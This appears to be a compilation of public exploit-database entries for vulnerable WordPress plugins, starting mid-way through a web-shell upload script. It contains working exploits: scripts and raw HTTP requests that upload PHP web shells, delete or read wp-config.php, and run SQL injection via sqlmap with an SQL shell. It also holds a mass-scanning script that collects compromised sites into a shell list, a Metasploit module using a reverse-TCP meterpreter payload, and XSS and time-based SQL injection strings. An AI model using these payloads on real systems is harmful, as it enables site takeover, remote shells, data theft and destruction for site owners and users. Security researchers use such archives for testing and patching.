| |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------17366980624047956771255332862--\r\n"
session.post(exploit_url, headers=header, data=body)
print('[+] Exploit done !')
print(' -> Webshell uploaded to: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/backup-guard/shell.php')
print('')
# Exploit Title: WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion
# Date: 11/07/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.miniorange.com/
# Software Link: https://wordpress.org/plugins/backup-and-restore-for-wp/
# Version: 1.0.3
# Tested on : Windows 10
#Poc:
----------------------------------REQUEST---------------------------------------
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=mo_eb_backup_report
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 155
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636463166%7C9VH5dtz6rmSefsnxLUWgFNF85FReGRWg61Nhbu95sJZ%7E82178aa467cd00f9cbcce03c6157fdcbf581a715d3cdc7a6b5c940dafe58fifd; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9371ce3ee91=admin%7C1836463166%7C9VH5dtz6rmSefsnxLUZgFNF85FReGRWg61Vhau95sJZ%7C9ae26395803f7d17f75c62d98856f3249e72688d38a9d3dbb616a0e3c808c917; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636290368
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
action=barfw_backup_ajax_redirect&call_type=delete_backup&file_name=wp-config.php&folder_name=C%3a%5cxampp%5chtdocs%5cwordpress%5c%5c&id=5&nonce=ee90968cce
----------------------------------------------------------------------------------
-------------------------------RESPONSE-------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 07 Nov 2021 13:19:38 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
X-Powered-By: PHP/8.0.7
Access-Control-Allow-Origin: http://localhost
Access-Control-Allow-Credentials: true
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 9
Connection: close
Content-Type: application/json; charset=UTF-8
"success"
----------------------------------------------------------------------------------
# Exploit Title: WP Background Takeover, Directory Traversal <= 4.1.4
# Google Dork: inurl:/plugins/wpsite-background-takeover
# Date: 2018-03-08
# Exploit Author: Colette Chamberland, Defiant, Inc.
# Vendor Homepage: https://99robots.com
# Software Link: https://99robots.com/products/wp-background-takeover-advertisements/
# Version: <= 4.1.4
# Tested on: Wordpress 4.9.x
# CVE : CVE-2018-9118
Description
Allows for an attacker to browse files via the download.php file:
http://target[.]com/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
# Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
# Date: 2024-04-16
# Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/plugins/background-image-cropper/
# Version: 1.2
# Category : webapps
# Tested on: windows 10 , firefox
import sys , requests, re
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)
shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo
"<form method='post' enctype='multipart/form-data'> <input type='file'
name='zb'><input type='submit' name='upload' value='upload'></form>";
if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'],
$_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to
Upload."; } } ?>"""
requests.urllib3.disable_warnings()
headers = {'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A
Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/60.0.3112.107 Moblie Safari/537.36',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
'referer': 'www.google.com'}
try:
target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
path = str(sys.argv[0]).split('\\')
exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')
def URLdomain(site):
if site.startswith("http://") :
site = site.replace("http://","")
elif site.startswith("https://") :
site = site.replace("https://","")
else :
pass
pattern = re.compile('(.*)/')
while re.findall(pattern,site):
sitez = re.findall(pattern,site)
site = sitez[0]
return site
def FourHundredThree(url):
try:
url = 'http://' + URLdomain(url)
check =
requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
allow_redirects=True,timeout=15)
if 'enctype="multipart/form-data" name="uploader"
id="uploader"><input type="file" name="file" size="50"><input name="_upl"
type="submit" id="_upl" value="Upload' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('Shells.txt', 'a').write(url +
'/wp-content/plugins/background-image-cropper/ups.php\n')
else:
url = 'https://' + URLdomain(url)
check =
requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
allow_redirects=True,verify=False ,timeout=15)
if 'enctype="multipart/form-data" name="uploader"
id="uploader"><input type="file" name="file" size="50"><input name="_upl"
type="submit" id="_upl" value="Upload' in check.content:
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
open('Shells.txt', 'a').write(url +
'/wp-content/plugins/background-image-cropper/ups.php\n')
else:
print ' -| ' + url + ' --> {}[Failed]'.format(fr)
except :
print ' -| ' + url + ' --> {}[Failed]'.format(fr)
mp = Pool(150)
mp.map(FourHundredThree, target)
mp.close()
mp.join()
print '\n [!] {}Saved in LOL.txt'.format(fc)
Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-07
Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
Vendor: Waters Edge Web Design and NetherWorks LLC
Vendor Notified: 2015-06-08
Advisory: http://www.vapid.dhs.org/advisory.php?v=125
Vendor Contact: plugins@wordpress.org
Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.
Vulnerability:
There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system. Including a .php file. The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.
In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user:
1 <?php
2
3 $filename = $_SERVER["DOCUMENT_ROOT"]."/wp-load.php";
4 if (file_exists($filename)) {
5 include_once($filename);
6 } else {
7 include_once("../../../../wp-load.php");
8 }
9 echo "Here";
10 $image_file = $_FILES['gf_aviary_file'];
11 if($image_file['name']!=''){
12 $max_file_size = 4*1024*1024;
13 $file_size = intval($image_file['size']);
14 if( $file_size > $max_file_size ){
15 $msg = "File Size is too big.";
16 $error_flag = true;
17 }
18 $extension = strtolower(end(explode('.', $image_file['name'])));
19 $aa_options = get_option('gf_aa_options');
20 $supported_files = $aa_options['supported_file_format'];
21 $supported_files = strtolower($supported_files);
22 if(!$error_flag && $supported_files != '' ){
23 $supported_files = explode (',', $supported_files);
24 if(!in_array($extension, $supported_files)){
25 $msg = "No Supported file.";
26 $error_flag = true;
27 }
28 }
29 if(!$error_flag){
30 $wp_upload_dir = wp_upload_dir();
31 if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
32 mkdir($wp_upload_dir['basedir'].'/gform_aviary');
33 }
34 $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
35 $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
36 $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name' ];
37 if(move_uploaded_file($image_file['tmp_name'], $file_name)){
38 $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['na me'];
39 }
40 }
41 $return_obj = array('status' => 'success', 'message' => $file_url);
42 echo json_encode($return_obj);
43 }
44 ?>
CVEID: 2015-4455
OSVDB:
Exploit Code:
<?php
/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0
6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
*/
$target_url = 'http://server/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
$file_name_with_full_path = '/var/www/shell.php';
echo "POST to $target_url $file_name_with_full_path";
$post = array('name' => 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
# Exploit Title: WP AutoSuggest 0.24 - SQL Injection
# Date: 01-12-2018
# Software Link: https://wordpress.org/plugins/wp-autosuggest/
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Version: 0.24
# Category: webapps
SQL Injection
File: autosuggest.php
Vulnerable code:
if (isset($_GET['wpas_keys'])) {
$wpas_keys = $_GET['wpas_keys'];
}
...
$wpas_keys = str_replace(' ','%',$wpas_keys);
$pageposts = $wpdb->get_results("SELECT * FROM $wpdb->posts WHERE (post_title LIKE '%$wpas_keys%') AND post_status = 'publish' ORDER BY post_date DESC");
Exploitation example:
sqlmap -u "http://URL/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1" --technique BT --dbms MYSQL --risk 3 --level 5 -p wpas_keys --tamper space2comment --sql-shell
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(
info,
'Name' => 'Wordpress Autoptimize Authenticated File Upload',
'Description' => %q{
The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file,
allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE.
},
'Author' =>
[
'Khanh Nguyen - Suncsr Team', # Vulnerability discovery
'Hoa Nguyen - Suncsr Team', # Metasploit module
'Thien Ngo - Suncsr Team' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2020-24948'],
['EDB', '48770'],
['WPVDB', '10372']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'Targets' => [['WP Autoptimize 2.7.6', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => '2020-08-24'))
register_options(
[
OptString.new('USERNAME', [true, 'The WordPress password to authenticate with', nil]),
OptString.new('PASSWORD', [true, 'The WordPress username to authenticate with', nil])
])
end
def check
check_plugin_version_from_readme('autoptimize','2.7.7')
end
def ao_ccss_import_nonce(cookie)
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_backend,'options-general.php'),
'cookie' => cookie,
'vars_get' => {
'page' => 'ao_critcss'
}
},5)
if res.code == 200
print_good("Found ao_ccss_import_nonce_code Value!")
else
fail_with(Failure::Unknown,'Server did not response in an expected way')
end
ao_ccss_import_nonce_code = res.body.match(/'ao_ccss_import_nonce', '(\w+)/).captures[0]
return ao_ccss_import_nonce_code
end
def exploit
username = datastore['USERNAME']
password = datastore['PASSWORD']
print_status("Trying to login as #{username}")
cookie = wordpress_login(datastore['USERNAME'],datastore['PASSWORD'])
if cookie.nil?
print_error("Unable to login as #{username}")
end
vars = ao_ccss_import_nonce(cookie)
print_status("Trying to upload payload")
filename = "#{rand_text_alpha_lower(8)}.php"
data = Rex::MIME::Message.new
data.add_part('ao_ccss_import', nil, nil, 'form-data; name="action"')
data.add_part(vars, nil, nil, 'form-data; name="ao_ccss_import_nonce"')
data.add_part(payload.encoded, 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
post_data = data.to_s
print_status("Uploading payload")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(wordpress_url_backend,'admin-ajax.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie
})
if res.code == 200
register_files_for_cleanup(filename)
else
fail_with(Failure::Unknown,'Server did not response in an expected way')
end
print_status("Calling uploaded file #{filename}")
send_request_cgi({'uri' => normalize_uri(wordpress_url_wp_content, 'uploads','ao_ccss',filename)},5)
end
end
# Exploit Title: Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)
# Date: 2020-08-24
# Software Link: https://wordpress.org/plugins/autoptimize/
# Author : SunCSR Team
# Version: v2.7.6
# Tested on Ubuntu 18.04 / Kali Linux
# Reference: https://wpvulndb.com/vulnerabilities/10372
Description :
-------------------------------------------------------------------
The ao_ccss_import AJAX call does not ensure that the file provided is a
legitimate Zip file, allowing high privilege users to upload arbitrary
files, such as PHP, leading to RCE.
[POC]
Step 1 :
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: pwnme
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101
Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://pwnme.me/wordpress/wp-admin/options-general.php?page=ao_critcss
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------26086940735210916964189813544
Content-Length: 685
Origin: http://pwnme
Connection: close
Cookie: autoptimize_feed=1;
wordpress_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7Cc2f54fb4e357d2c591b7e5f53e6adb9531b0de5cc5fbc3cab3185f63917307cd;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7C409cbfa6f750ff5902273e879e79d9f746c038c35228c978ea9cc3525eb12602;
wp-settings-time-1=1598516614
-----------------------------404272946439029073744006559647
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/zip
<?php Shell Content Here ! ?>
-----------------------------404272946439029073744006559647
Content-Disposition: form-data; name="action"
ao_ccss_import
-----------------------------404272946439029073744006559647
Content-Disposition: form-data; name="ao_ccss_import_nonce"
f25ca64f22
-----------------------------404272946439029073744006559647--
[Response]
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 27 Aug 2020 08:21:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Access-Control-Allow-Origin: http://pwnme.me
Access-Control-Allow-Credentials: true
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 53
{"code":"200","msg":"Settings imported successfully"}
Step 2: Access to
http://victim//wordpress/wp-content/uploads/ao_ccss/shell.php
Recommendations: Update to version 2.7.7
Thank you very much!
# Exploit Title: WordPress Plugin Audio Record 1.0 - Arbitrary File Upload
# Date: 2018-12-24
# Software Link: https://wordpress.org/plugins/audio-record/
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Version: 1.0
# Category: webapps
# Unrestricted file upload in record upload process allowing arbitrary extension.
# File: recorder.php
# Vulnerable code:
function save_record_callback() {
foreach(array('audio') as $type) {
if (isset($_FILES["${type}-blob"])) {
$fileName = uniqid() . '_' .$_POST["${type}-filename"] ;
$path_array = wp_upload_dir();
$path = str_replace('\\', '/', $path_array['path']);
$uploadDirectory = $path . "/$fileName";
if (!move_uploaded_file($_FILES["${type}-blob"]["tmp_name"], $uploadDirectory)) {
echo 000;
wp_die("problem moving uploaded file");
}
# Exploitation example:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
...
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="audio-filename"
file.php
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="audio-blob"; filename="blob"
Content-Type: audio/wav
<?php phpinfo();
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="action"
save_record
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="course_id"
undefined
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="unit_id"
undefined
-----------------------------18311719029180117571501079851--
# Uploaded file will be located at standard WordPress media upload directory (for ex: /wp-content/uploads/year/month/).
# If directory listing is disabled - file name can be guessed due to cryptographically insecure nature of uniqid() call.
source: https://www.securityfocus.com/bid/57848/info
The Audio Player plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Audio player versions prior to 2.0.4.6 are vulnerable.
http://www.example.com/wp-content/plugins/audio-player/assets/player.swf?playerID=a\â?))}catch(e){alert(1)}//
source: https://www.securityfocus.com/bid/49625/info
Auctions plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Owen Cutajar Auctions versions 1.8.8 and prior are vulnerable.
http://www.example.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20